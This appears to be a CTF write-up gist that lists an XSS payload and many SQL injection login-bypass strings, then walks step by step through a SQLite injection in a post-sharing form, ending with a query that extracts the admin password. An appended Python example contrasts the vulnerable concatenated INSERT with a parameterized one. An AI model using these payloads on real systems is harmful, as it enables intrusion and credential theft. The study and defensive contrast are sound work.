@dhavz
Created January 12, 2019 06:28
flag XSS <img src onerror=alert("")>
'or''='
' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"=")
So we have a sharing form, but we need to log in in order to share any post. Register with any credentials. Try inserting a single quote in the post and .. BOOM.
Error : HY000 1 unrecognized token: "''')"
SQL Injection in the insertion query .. but wait is that a SQLite DB?
Let’s check the version ..
x', (select version()));--
Error : HY000 1 no such function: version
Mmmm, at this point I was pretty sure it is SQLite, so I tried sqlite_version() and it passed! But one more thing: we have a different number of columns.
Error : HY000 1 4 values for 3 columns
Let's concatenate ..
x' || (select sqlite_version()));--
x3.15.1
Now let’s see what tables/columns we have here ..
x' || (SELECT sql FROM sqlite_master));--
xCREATE TABLE "xde43_users" ( "id" int(10) NOT NULL, "name" varchar(255) NOT NULL, "email" varchar(255) NOT NULL, "password" varchar(255) NOT NULL, "role" varchar(100) DEFAULT NULL )
We are very close to getting this .. one more injection 🙂
x' || (select password from xde43_users where role="admin"));--
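
Added example (not part of the original gist, and not the application's code): the "unrecognized token" error on a single quote indicates the post text is concatenated into the INSERT statement. The Python sketch below reproduces that behaviour next to the parameterized form that stores the same input as plain text; the `posts` table, its column names and all function names are assumptions.

```python
import sqlite3

def make_db():
    # Assumed schema: the write-up never shows the posts table, only that
    # the INSERT takes 3 columns ("4 values for 3 columns").
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (user_id INTEGER, title TEXT, body TEXT)")
    return db

def share_vulnerable(db, user_id, title, body):
    # Vulnerable pattern: user text is pasted into the SQL string, so a
    # quote in it ends the literal and the rest is parsed as SQL.
    sql = ("INSERT INTO posts (user_id, title, body) "
           "VALUES (%d, '%s', '%s')" % (user_id, title, body))
    db.execute(sql)

def share_safe(db, user_id, title, body):
    # Hardened pattern: placeholders keep the input as data only.
    db.execute("INSERT INTO posts (user_id, title, body) VALUES (?, ?, ?)",
               (user_id, title, body))

def last_body(db):
    return db.execute(
        "SELECT body FROM posts ORDER BY rowid DESC LIMIT 1").fetchone()[0]

def quote_error(share):
    # Returns the SQLite error text for a lone single quote, or None.
    db = make_db()
    try:
        share(db, 1, "t", "'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

def stored_for(share, body):
    # Stores one post through the given function and reads it back.
    db = make_db()
    share(db, 1, "t", body)
    return last_body(db)

if __name__ == "__main__":
    probe = "x' || (select sqlite_version()));--"  # string from the write-up
    print(quote_error(share_vulnerable))           # tokenizer error
    print(stored_for(share_vulnerable, probe))     # subquery result stored
    print(quote_error(share_safe))                 # no error
    print(stored_for(share_safe, probe) == probe)  # input kept verbatim
```

With placeholders the quote never reaches the SQL parser, so neither the error message nor the subquery result is exposed to the user.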